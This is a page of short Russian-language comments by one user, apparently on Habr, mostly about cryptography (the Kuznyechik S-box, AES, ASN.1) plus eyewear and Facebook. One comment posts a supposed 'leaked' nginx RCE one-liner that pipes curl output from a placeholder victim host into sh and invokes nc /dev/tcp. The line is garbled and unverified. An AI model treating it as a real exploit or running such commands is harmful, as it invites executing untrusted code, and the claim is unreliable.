Про ГОСТовский шифр Кузнечик, его SBox и потерянные сиды

Для криптографической науки несёт ценность тот факт, что таблица подстановок не была сгенерирована случайно. Чем меньше размер программы, тем более «неслучайно» она была сгенерирована

Про ГОСТовский шифр Кузнечик, его SBox и потерянные сиды

AES и SM4 изначально описаны как структуры, а не как последовательность байт

Про ГОСТовский шифр Кузнечик, его SBox и потерянные сиды

Мы разве использовали такие интерпретаторы?

Про ГОСТовский шифр Кузнечик, его SBox и потерянные сиды

Можете пояснить?

Про ГОСТовский шифр Кузнечик, его SBox и потерянные сиды

Если совсем в двух словах — эти два массива параметризуют структуру под названием TKLog, о которой я писал в предыдущей статье. Разные значения в массивах дадут нам разные варианты структуры TKLog

Про ГОСТовский шифр Кузнечик, его SBox и потерянные сиды

Где гарантия, что этот алгоритм при определенных условиях не превратит SBox в линейный?

Про ГОСТовский шифр Кузнечик, его SBox и потерянные сиды

именно

Про ГОСТовский шифр Кузнечик, его SBox и потерянные сиды

Это распространенная практика, но от неё потихоньку уходят

Про ГОСТовский шифр Кузнечик, его SBox и потерянные сиды

Таблица была встроена в Кузнечик просто как магический набор чисел. То, что внутри неё есть структура или «алгоритм» выяснилось позже благодаря реверс инжинирингу. Мы не знаем зачем он там, в этом вся загвоздка

Про ГОСТовский шифр Кузнечик, его SBox и потерянные сиды

Эта таблица — константа. Она зафиксирована и общеизвестна. Но вот её характеристики вызывают много вопросов, т.к. это самый важный элемент всего алгоритма

Лазерная коррекция зрения — так ли эффективен метод Smile на самом деле?

Когда в очках совсем никак, надеваю контактные линзы однодневки. В них можно и в бассейн и в 3D кино и солнечные очки надеть

Лазерная коррекция зрения — так ли эффективен метод Smile на самом деле?

Купил себе очки с асферическими тонкими линзами и безободковой оправой, которая весит всего 6 грамм. На лице вообще не чувствуются. Да, дорого, но все равно во много раз дешевле, чем коррекция с непонятным результатом. Я бы не испытывал судьбу, пока у меня не будет хотя бы -2.5 (сейчас -1.75)

updated: Zero-Click Server-Side RCE в njs

Утекло. Не проверял

LEAKED: nginx 1.x PoC on-liner. Null-byte RCE overflow in nginx BLT/Stream

curl -gsS victim.server.here/../../../%00/n…\<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Кратко с реализацией о AES 128 ECB

Во-первых ECB. Во-вторых, о чем статья? Об умении копипастить непонятные сорцы на хабр?

Самые интересные металлы

У чистого титана твердость 34-36 HRC, это как у алюминия

Фейсбук обновит дизайн, объединит мессенджеры и сфокусируется на безопасности

Цукерберг пытается пошутить насчет приватности, но никто почему-то не смеётся

На одном слайде он говорит, что The Future is Private, а потом «Messenger will provide businesses the opportunity to learn about their customers in a personalized way at scale.»

Всё это лишь очередное бла бла бла

Асимметричное шифрование на практике

Мощность пароля? AES не работает с паролями, а то, о чём вы пишете — просто опасно делать. Очень слабая статья

Bowers&Wilkins PX. Запоздалый НеОбзор

«Обзор» настолько залит маркетинговыми слюнями, что не видно даже те пару полезных слов, которые могли бы в нём присутствовать

Простой ASN1-кодек на базе sprintf

Подавляющее большинство разработчиков программ считают стандарт ASN.1 сложным. Я тоже так думал до недавнего времени.

Статья только усугубила это мнение. И это еще без explicit/implicit и кастомных тегов.
Советую всем утилиту для просмотра ASN.1 структур — lapo.it/asn1js.очень помогает при дебаге

Самое простое объяснение принципа работы современных алгоритмов симметричного шифрования

Писал видимо кто-то из прошлого века, потому что 3des уже давно все забыли. Применять стоит алгоритмы на базе AES или той же ChaCha, зависит от задачи. Посмотрите на библиотеку libsodium